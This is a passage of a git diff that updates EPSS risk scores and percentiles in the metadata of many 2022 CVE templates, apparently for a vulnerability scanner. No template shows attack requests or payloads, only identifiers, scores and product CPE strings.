cpe:2.3:a:motioneye_project:motioneye:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2599.yaml b/http/cves/2022/CVE-2022-2599.yaml index 3bf7045c63..8bc6c75f3b 100644 --- a/http/cves/2022/CVE-2022-2599.yaml +++ b/http/cves/2022/CVE-2022-2599.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-2599 cwe-id: CWE-79 epss-score: 0.00119 - epss-percentile: 0.45778 + epss-percentile: 0.45893 cpe: cpe:2.3:a:anti-malware_security_and_brute-force_firewall_project:anti-malware_security_and_brute-force_firewall:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-26134.yaml b/http/cves/2022/CVE-2022-26134.yaml index f19ab18dd4..9daaae0c6b 100644 --- a/http/cves/2022/CVE-2022-26134.yaml +++ b/http/cves/2022/CVE-2022-26134.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-26134 cwe-id: CWE-917 - epss-score: 0.97523 - epss-percentile: 0.99986 + epss-score: 0.97535 + epss-percentile: 0.99993 cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-26138.yaml b/http/cves/2022/CVE-2022-26138.yaml index ca6ac3eaee..2d419476bf 100644 --- a/http/cves/2022/CVE-2022-26138.yaml +++ b/http/cves/2022/CVE-2022-26138.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-26138 cwe-id: CWE-798 - epss-score: 0.96323 - epss-percentile: 0.99422 + epss-score: 0.96601 + epss-percentile: 0.99537 cpe: cpe:2.3:a:atlassian:questions_for_confluence:2.7.34:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-26148.yaml b/http/cves/2022/CVE-2022-26148.yaml index 45e687b710..7b13130ed8 100644 --- a/http/cves/2022/CVE-2022-26148.yaml +++ b/http/cves/2022/CVE-2022-26148.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-26148 cwe-id: CWE-312 epss-score: 0.15727 - epss-percentile: 0.95385 + epss-percentile: 0.95407 cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-26159.yaml b/http/cves/2022/CVE-2022-26159.yaml index 1ad517ffdf..92d3959864 100644 --- a/http/cves/2022/CVE-2022-26159.yaml +++ b/http/cves/2022/CVE-2022-26159.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-26159 cwe-id: CWE-425 epss-score: 0.00597 - epss-percentile: 0.75954 + epss-percentile: 0.76051 cpe: cpe:2.3:a:ametys:ametys:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-26233.yaml b/http/cves/2022/CVE-2022-26233.yaml index 3d36ae9caf..13a7011169 100644 --- a/http/cves/2022/CVE-2022-26233.yaml +++ b/http/cves/2022/CVE-2022-26233.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-26233 cwe-id: CWE-22 epss-score: 0.00654 - epss-percentile: 0.77133 + epss-percentile: 0.77223 cpe: cpe:2.3:a:barco:control_room_management_suite:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-26263.yaml b/http/cves/2022/CVE-2022-26263.yaml index 32efcbb371..09bc9af8f6 100644 --- a/http/cves/2022/CVE-2022-26263.yaml +++ b/http/cves/2022/CVE-2022-26263.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-26263 cwe-id: CWE-79 epss-score: 0.00147 - epss-percentile: 0.50452 + epss-percentile: 0.50561 cpe: cpe:2.3:a:yonyou:u8\+:13.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2627.yaml b/http/cves/2022/CVE-2022-2627.yaml index cb38558125..49699b3264 100644 --- a/http/cves/2022/CVE-2022-2627.yaml +++ b/http/cves/2022/CVE-2022-2627.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-2627 cwe-id: CWE-79 epss-score: 0.00119 - epss-percentile: 0.45778 + epss-percentile: 0.45893 cpe: cpe:2.3:a:tagdiv:newspaper:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2633.yaml b/http/cves/2022/CVE-2022-2633.yaml index cd8c24f565..9009ee6b28 100644 --- a/http/cves/2022/CVE-2022-2633.yaml +++ b/http/cves/2022/CVE-2022-2633.yaml @@ -20,9 +20,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N cvss-score: 8.2 cve-id: CVE-2022-2633 - cwe-id: CWE-610,CWE-73 - epss-score: 0.05947 - epss-percentile: 0.92663 + cwe-id: CWE-610 + epss-score: 0.07008 + epss-percentile: 0.93291 cpe: cpe:2.3:a:plugins360:all-in-one_video_gallery:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-26352.yaml b/http/cves/2022/CVE-2022-26352.yaml index 7fb74091a7..873f429794 100644 --- a/http/cves/2022/CVE-2022-26352.yaml +++ b/http/cves/2022/CVE-2022-26352.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-26352 cwe-id: CWE-22 - epss-score: 0.97484 - epss-percentile: 0.99967 + epss-score: 0.97526 + epss-percentile: 0.99991 cpe: cpe:2.3:a:dotcms:dotcms:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-26564.yaml b/http/cves/2022/CVE-2022-26564.yaml index 194a8eb939..0af1cc94d0 100644 --- a/http/cves/2022/CVE-2022-26564.yaml +++ b/http/cves/2022/CVE-2022-26564.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-26564 cwe-id: CWE-79 epss-score: 0.00097 - epss-percentile: 0.40019 + epss-percentile: 0.40092 cpe: cpe:2.3:a:digitaldruid:hoteldruid:3.0.3:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2022/CVE-2022-26833.yaml b/http/cves/2022/CVE-2022-26833.yaml index eb578d738d..b972b38a4a 100644 --- a/http/cves/2022/CVE-2022-26833.yaml +++ b/http/cves/2022/CVE-2022-26833.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-26833 cwe-id: CWE-306 - epss-score: 0.02854 - epss-percentile: 0.89615 + epss-score: 0.03208 + epss-percentile: 0.90206 cpe: cpe:2.3:a:openautomationsoftware:oas_platform:16.00.0112:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-26960.yaml b/http/cves/2022/CVE-2022-26960.yaml index a261d5f1cf..7d9a6415e9 100644 --- a/http/cves/2022/CVE-2022-26960.yaml +++ b/http/cves/2022/CVE-2022-26960.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-26960 cwe-id: CWE-22 epss-score: 0.88417 - epss-percentile: 0.984 + epss-percentile: 0.98433 cpe: cpe:2.3:a:std42:elfinder:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2733.yaml b/http/cves/2022/CVE-2022-2733.yaml index 06c8ab9bcd..27302d5266 100644 --- a/http/cves/2022/CVE-2022-2733.yaml +++ b/http/cves/2022/CVE-2022-2733.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-2733 cwe-id: CWE-79 - epss-score: 0.00161 - epss-percentile: 0.52555 + epss-score: 0.00176 + epss-percentile: 0.54727 cpe: cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-2756.yaml b/http/cves/2022/CVE-2022-2756.yaml index c0fe0988af..ba35220d2f 100644 --- a/http/cves/2022/CVE-2022-2756.yaml +++ b/http/cves/2022/CVE-2022-2756.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.5 cve-id: CVE-2022-2756 cwe-id: CWE-918 - epss-score: 0.01041 - epss-percentile: 0.82222 + epss-score: 0.01379 + epss-percentile: 0.8488 cpe: cpe:2.3:a:kavitareader:kavita:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-27593.yaml b/http/cves/2022/CVE-2022-27593.yaml index be743bbba6..0501c0b733 100644 --- a/http/cves/2022/CVE-2022-27593.yaml +++ b/http/cves/2022/CVE-2022-27593.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.1 cve-id: CVE-2022-27593 cwe-id: CWE-610 - epss-score: 0.44245 - epss-percentile: 0.9702 + epss-score: 0.44323 + epss-percentile: 0.97045 cpe: cpe:2.3:a:qnap:photo_station:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-27849.yaml b/http/cves/2022/CVE-2022-27849.yaml index d3ab39476e..c53fdd18be 100644 --- a/http/cves/2022/CVE-2022-27849.yaml +++ b/http/cves/2022/CVE-2022-27849.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-27849 cwe-id: CWE-200 epss-score: 0.00732 - epss-percentile: 0.78603 + epss-percentile: 0.78711 cpe: cpe:2.3:a:plugin-planet:simple_ajax_chat:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-27926.yaml b/http/cves/2022/CVE-2022-27926.yaml index f825fc883a..7e39e684f0 100644 --- a/http/cves/2022/CVE-2022-27926.yaml +++ b/http/cves/2022/CVE-2022-27926.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-27926 cwe-id: CWE-79 epss-score: 0.91614 - epss-percentile: 0.9865 + epss-percentile: 0.98683 cpe: cpe:2.3:a:zimbra:collaboration:9.0.0:-:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-27927.yaml b/http/cves/2022/CVE-2022-27927.yaml index d853510b15..1ad1cea4ed 100644 --- a/http/cves/2022/CVE-2022-27927.yaml +++ b/http/cves/2022/CVE-2022-27927.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-27927 cwe-id: CWE-89 - epss-score: 0.11362 - epss-percentile: 0.94653 + epss-score: 0.10451 + epss-percentile: 0.94459 cpe: cpe:2.3:a:microfinance_management_system_project:microfinance_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-27984.yaml b/http/cves/2022/CVE-2022-27984.yaml index 784cd455ed..5a3e2d5cfb 100644 --- a/http/cves/2022/CVE-2022-27984.yaml +++ b/http/cves/2022/CVE-2022-27984.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-27984 cwe-id: CWE-89 - epss-score: 0.01542 - epss-percentile: 0.85661 + epss-score: 0.03664 + epss-percentile: 0.90798 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-27985.yaml b/http/cves/2022/CVE-2022-27985.yaml index dbe157268f..0b7ffdb818 100644 --- a/http/cves/2022/CVE-2022-27985.yaml +++ b/http/cves/2022/CVE-2022-27985.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-27985 cwe-id: CWE-89 - epss-score: 0.01378 - epss-percentile: 0.84789 + epss-score: 0.03284 + epss-percentile: 0.90318 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-28022.yaml b/http/cves/2022/CVE-2022-28022.yaml index d4996bbad5..c1c7ceaa87 100644 --- a/http/cves/2022/CVE-2022-28022.yaml +++ b/http/cves/2022/CVE-2022-28022.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-28022 cwe-id: CWE-89 - epss-score: 0.02036 - epss-percentile: 0.877 + epss-score: 0.02852 + epss-percentile: 0.89667 cpe: cpe:2.3:a:purchase_order_management_system_project:purchase_order_management_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-28023.yaml b/http/cves/2022/CVE-2022-28023.yaml index aa63f395bd..bf49724502 100644 --- a/http/cves/2022/CVE-2022-28023.yaml +++ b/http/cves/2022/CVE-2022-28023.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-28023 cwe-id: CWE-89 - epss-score: 0.02036 - epss-percentile: 0.877 + epss-score: 0.02852 + epss-percentile: 0.89667 cpe: cpe:2.3:a:purchase_order_management_system_project:purchase_order_management_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-28032.yaml b/http/cves/2022/CVE-2022-28032.yaml index 61f88f92bf..1ced14061b 100644 --- a/http/cves/2022/CVE-2022-28032.yaml +++ b/http/cves/2022/CVE-2022-28032.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-28032 cwe-id: CWE-89 - epss-score: 0.02036 - epss-percentile: 0.877 + epss-score: 0.02852 + epss-percentile: 0.89667 cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-28079.yaml b/http/cves/2022/CVE-2022-28079.yaml index b433c5e695..13ca2d1599 100644 --- a/http/cves/2022/CVE-2022-28079.yaml +++ b/http/cves/2022/CVE-2022-28079.yaml @@ -21,8 +21,8 @@ info: cvss-score: 8.8 cve-id: CVE-2022-28079 cwe-id: CWE-89 - epss-score: 0.81882 - epss-percentile: 0.9808 + epss-score: 0.80212 + epss-percentile: 0.98029 cpe: cpe:2.3:a:college_management_system_project:college_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-28080.yaml b/http/cves/2022/CVE-2022-28080.yaml index 5789802c07..bdb14f7a9e 100644 --- a/http/cves/2022/CVE-2022-28080.yaml +++ b/http/cves/2022/CVE-2022-28080.yaml @@ -21,8 +21,8 @@ info: cvss-score: 8.8 cve-id: CVE-2022-28080 cwe-id: CWE-89 - epss-score: 0.01516 - epss-percentile: 0.85517 + epss-score: 0.01488 + epss-percentile: 0.85428 cpe: cpe:2.3:a:event_management_system_project:event_management_system:1.0:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-28117.yaml b/http/cves/2022/CVE-2022-28117.yaml index 81e30b0674..8f2018b672 100644 --- a/http/cves/2022/CVE-2022-28117.yaml +++ b/http/cves/2022/CVE-2022-28117.yaml @@ -20,8 +20,8 @@ info: cvss-score: 4.9 cve-id: CVE-2022-28117 cwe-id: CWE-918 - epss-score: 0.02612 - epss-percentile: 0.89161 + epss-score: 0.03193 + epss-percentile: 0.9018 cpe: cpe:2.3:a:naviwebs:navigate_cms:2.9.4:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-28219.yaml b/http/cves/2022/CVE-2022-28219.yaml index 6f5f91a74e..031af6fe51 100644 --- a/http/cves/2022/CVE-2022-28219.yaml +++ b/http/cves/2022/CVE-2022-28219.yaml @@ -23,8 +23,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-28219 cwe-id: CWE-611 - epss-score: 0.97413 - epss-percentile: 0.99916 + epss-score: 0.97392 + epss-percentile: 0.99909 cpe: cpe:2.3:a:zohocorp:manageengine_adaudit_plus:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-28290.yaml b/http/cves/2022/CVE-2022-28290.yaml index 6742027ed9..2cac98212b 100644 --- a/http/cves/2022/CVE-2022-28290.yaml +++ b/http/cves/2022/CVE-2022-28290.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-28290 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36894 + epss-percentile: 0.36947 cpe: cpe:2.3:a:welaunch:wordpress_country_selector:1.6.5:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-28363.yaml b/http/cves/2022/CVE-2022-28363.yaml index b08bc457d2..5a9205b1be 100644 --- a/http/cves/2022/CVE-2022-28363.yaml +++ b/http/cves/2022/CVE-2022-28363.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-28363 cwe-id: CWE-79 epss-score: 0.00237 - epss-percentile: 0.61582 + epss-percentile: 0.61755 cpe: cpe:2.3:a:reprisesoftware:reprise_license_manager:14.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-28365.yaml b/http/cves/2022/CVE-2022-28365.yaml index dbffc53736..3a96be60f7 100644 --- a/http/cves/2022/CVE-2022-28365.yaml +++ b/http/cves/2022/CVE-2022-28365.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-28365 cwe-id: CWE-425 epss-score: 0.00689 - epss-percentile: 0.77829 + epss-percentile: 0.77964 cpe: cpe:2.3:a:reprisesoftware:reprise_license_manager:14.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-2863.yaml b/http/cves/2022/CVE-2022-2863.yaml index 77c0f07512..dad3d5425d 100644 --- a/http/cves/2022/CVE-2022-2863.yaml +++ b/http/cves/2022/CVE-2022-2863.yaml @@ -18,8 +18,8 @@ info: cvss-score: 4.9 cve-id: CVE-2022-2863 cwe-id: CWE-22 - epss-score: 0.53774 - epss-percentile: 0.97302 + epss-score: 0.54582 + epss-percentile: 0.97343 cpe: cpe:2.3:a:wpvivid:migration\,_backup\,_staging:*:*:*:*:*:wordpress:*:* metadata: max-request: 3 diff --git a/http/cves/2022/CVE-2022-28923.yaml b/http/cves/2022/CVE-2022-28923.yaml index 98751a27f5..426e514809 100644 --- a/http/cves/2022/CVE-2022-28923.yaml +++ b/http/cves/2022/CVE-2022-28923.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-28923 cwe-id: CWE-601 - epss-score: 0.00748 - epss-percentile: 0.78815 + epss-score: 0.00769 + epss-percentile: 0.79252 cpe: cpe:2.3:a:caddyserver:caddy:2.4.6:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-28955.yaml b/http/cves/2022/CVE-2022-28955.yaml index c926af055b..61d06fac00 100644 --- a/http/cves/2022/CVE-2022-28955.yaml +++ b/http/cves/2022/CVE-2022-28955.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-28955 cwe-id: CWE-287 - epss-score: 0.01795 - epss-percentile: 0.86714 + epss-score: 0.02487 + epss-percentile: 0.88982 cpe: cpe:2.3:o:dlink:dir-816l_firmware:206b01:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-29004.yaml b/http/cves/2022/CVE-2022-29004.yaml index ebd1391077..40654d8217 100644 --- a/http/cves/2022/CVE-2022-29004.yaml +++ b/http/cves/2022/CVE-2022-29004.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-29004 cwe-id: CWE-79 - epss-score: 0.00287 - epss-percentile: 0.65329 + epss-score: 0.00218 + epss-percentile: 0.59748 cpe: cpe:2.3:a:phpgurukul:e-diary_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-29005.yaml b/http/cves/2022/CVE-2022-29005.yaml index 08a3b1cf2d..6df1f6bcb3 100644 --- a/http/cves/2022/CVE-2022-29005.yaml +++ b/http/cves/2022/CVE-2022-29005.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-29005 cwe-id: CWE-79 - epss-score: 0.00149 - epss-percentile: 0.50712 + epss-score: 0.0015 + epss-percentile: 0.5109 cpe: cpe:2.3:a:phpgurukul:online_birth_certificate_system:1.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-29006.yaml b/http/cves/2022/CVE-2022-29006.yaml index 3bcd2f8c9c..41f8980783 100644 --- a/http/cves/2022/CVE-2022-29006.yaml +++ b/http/cves/2022/CVE-2022-29006.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-29006 cwe-id: CWE-89 epss-score: 0.15861 - epss-percentile: 0.95412 + epss-percentile: 0.95434 cpe: cpe:2.3:a:phpgurukul:directory_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-29007.yaml b/http/cves/2022/CVE-2022-29007.yaml index 1af9396f3e..b251446ccf 100644 --- a/http/cves/2022/CVE-2022-29007.yaml +++ b/http/cves/2022/CVE-2022-29007.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-29007 cwe-id: CWE-89 epss-score: 0.15861 - epss-percentile: 0.95412 + epss-percentile: 0.95434 cpe: cpe:2.3:a:phpgurukul:dairy_farm_shop_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-29009.yaml b/http/cves/2022/CVE-2022-29009.yaml index 643e6f8ccd..5eb2252eb2 100644 --- a/http/cves/2022/CVE-2022-29009.yaml +++ b/http/cves/2022/CVE-2022-29009.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-29009 cwe-id: CWE-89 epss-score: 0.15861 - epss-percentile: 0.95412 + epss-percentile: 0.95434 cpe: cpe:2.3:a:phpgurukul:cyber_cafe_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-29014.yaml b/http/cves/2022/CVE-2022-29014.yaml index 0b10943bb1..c50995b65c 100644 --- a/http/cves/2022/CVE-2022-29014.yaml +++ b/http/cves/2022/CVE-2022-29014.yaml @@ -18,8 +18,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-29014 - epss-score: 0.79717 - epss-percentile: 0.97987 + epss-score: 0.77285 + epss-percentile: 0.97938 cpe: cpe:2.3:o:razer:sila_firmware:2.0.441_api-2.0.418:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-29078.yaml b/http/cves/2022/CVE-2022-29078.yaml index 04809ef58c..4257bc5e7c 100644 --- a/http/cves/2022/CVE-2022-29078.yaml +++ b/http/cves/2022/CVE-2022-29078.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-29078 cwe-id: CWE-94 - epss-score: 0.21451 - epss-percentile: 0.95962 + epss-score: 0.34975 + epss-percentile: 0.96733 cpe: cpe:2.3:a:ejs:ejs:3.1.6:*:*:*:*:node.js:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-29153.yaml b/http/cves/2022/CVE-2022-29153.yaml index d1cd7c855e..75016f6bed 100644 --- a/http/cves/2022/CVE-2022-29153.yaml +++ b/http/cves/2022/CVE-2022-29153.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-29153 cwe-id: CWE-918 - epss-score: 0.01187 - epss-percentile: 0.83456 + epss-score: 0.02619 + epss-percentile: 0.89233 cpe: cpe:2.3:a:hashicorp:consul:*:*:*:*:-:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-29272.yaml b/http/cves/2022/CVE-2022-29272.yaml index fa43786e25..4f781c7a50 100644 --- a/http/cves/2022/CVE-2022-29272.yaml +++ b/http/cves/2022/CVE-2022-29272.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-29272 cwe-id: CWE-601 epss-score: 0.0033 - epss-percentile: 0.6781 + epss-percentile: 0.67975 cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-29298.yaml b/http/cves/2022/CVE-2022-29298.yaml index b9e107dc46..f505a494a6 100644 --- a/http/cves/2022/CVE-2022-29298.yaml +++ b/http/cves/2022/CVE-2022-29298.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-29298 cwe-id: CWE-22 - epss-score: 0.18227 - epss-percentile: 0.95677 + epss-score: 0.1374 + epss-percentile: 0.95105 cpe: cpe:2.3:o:contec:sv-cpt-mc310_firmware:6.00:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-29303.yaml b/http/cves/2022/CVE-2022-29303.yaml index 0cf9ca0db9..f9a2b147a6 100644 --- a/http/cves/2022/CVE-2022-29303.yaml +++ b/http/cves/2022/CVE-2022-29303.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-29303 cwe-id: CWE-78 - epss-score: 0.95573 - epss-percentile: 0.99232 + epss-score: 0.95299 + epss-percentile: 0.99193 cpe: cpe:2.3:o:contec:sv-cpt-mc310_firmware:6.00:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-29349.yaml b/http/cves/2022/CVE-2022-29349.yaml index 1abb593526..5e5819cb74 100644 --- a/http/cves/2022/CVE-2022-29349.yaml +++ b/http/cves/2022/CVE-2022-29349.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-29349 cwe-id: CWE-79 - epss-score: 0.02714 - epss-percentile: 0.89378 + epss-score: 0.01698 + epss-percentile: 0.86387 cpe: cpe:2.3:a:keking:kkfileview:4.0.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-29383.yaml b/http/cves/2022/CVE-2022-29383.yaml index b8b3d27d31..d9ad2c32ff 100644 --- a/http/cves/2022/CVE-2022-29383.yaml +++ b/http/cves/2022/CVE-2022-29383.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-29383 cwe-id: CWE-89 - epss-score: 0.49852 - epss-percentile: 0.97209 + epss-score: 0.47914 + epss-percentile: 0.97161 cpe: cpe:2.3:o:netgear:ssl312_firmware:fvs336gv2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-29455.yaml b/http/cves/2022/CVE-2022-29455.yaml index afe69d1aea..63ccfefb19 100644 --- a/http/cves/2022/CVE-2022-29455.yaml +++ b/http/cves/2022/CVE-2022-29455.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-29455 cwe-id: CWE-79 - epss-score: 0.00222 - epss-percentile: 0.6031 + epss-score: 0.0019 + epss-percentile: 0.56534 cpe: cpe:2.3:a:elementor:website_builder:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-29464.yaml b/http/cves/2022/CVE-2022-29464.yaml index 8426929700..37ed7b8053 100644 --- a/http/cves/2022/CVE-2022-29464.yaml +++ b/http/cves/2022/CVE-2022-29464.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-29464 cwe-id: CWE-22 - epss-score: 0.97191 - epss-percentile: 0.99775 + epss-score: 0.97235 + epss-percentile: 0.99808 cpe: cpe:2.3:a:wso2:api_manager:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-29548.yaml b/http/cves/2022/CVE-2022-29548.yaml index 374b814929..edbbe420b8 100644 --- a/http/cves/2022/CVE-2022-29548.yaml +++ b/http/cves/2022/CVE-2022-29548.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-29548 cwe-id: CWE-79 epss-score: 0.00299 - epss-percentile: 0.66065 + epss-percentile: 0.66249 cpe: cpe:2.3:a:wso2:api_manager:2.2.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-29775.yaml b/http/cves/2022/CVE-2022-29775.yaml index dbd4b01712..98aa19f2ba 100644 --- a/http/cves/2022/CVE-2022-29775.yaml +++ b/http/cves/2022/CVE-2022-29775.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-29775 cwe-id: CWE-287 - epss-score: 0.00934 - epss-percentile: 0.81215 + epss-score: 0.01088 + epss-percentile: 0.82745 cpe: cpe:2.3:a:ispyconnect:ispy:7.2.2.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-30073.yaml b/http/cves/2022/CVE-2022-30073.yaml index c083da7deb..d937fb041e 100644 --- a/http/cves/2022/CVE-2022-30073.yaml +++ b/http/cves/2022/CVE-2022-30073.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-30073 cwe-id: CWE-79 epss-score: 0.00205 - epss-percentile: 0.58228 + epss-percentile: 0.58384 cpe: cpe:2.3:a:wbce:wbce_cms:1.5.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-30489.yaml b/http/cves/2022/CVE-2022-30489.yaml index 848b99789a..1e922f1777 100644 --- a/http/cves/2022/CVE-2022-30489.yaml +++ b/http/cves/2022/CVE-2022-30489.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-30489 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36894 + epss-percentile: 0.36947 cpe: cpe:2.3:o:wavlink:wn535g3_firmware:-:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-30512.yaml b/http/cves/2022/CVE-2022-30512.yaml index 7ed417aa77..895451f360 100644 --- a/http/cves/2022/CVE-2022-30512.yaml +++ b/http/cves/2022/CVE-2022-30512.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-30512 cwe-id: CWE-89 - epss-score: 0.0163 - epss-percentile: 0.86106 + epss-score: 0.01542 + epss-percentile: 0.85721 cpe: cpe:2.3:a:school_dormitory_management_system_project:school_dormitory_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git 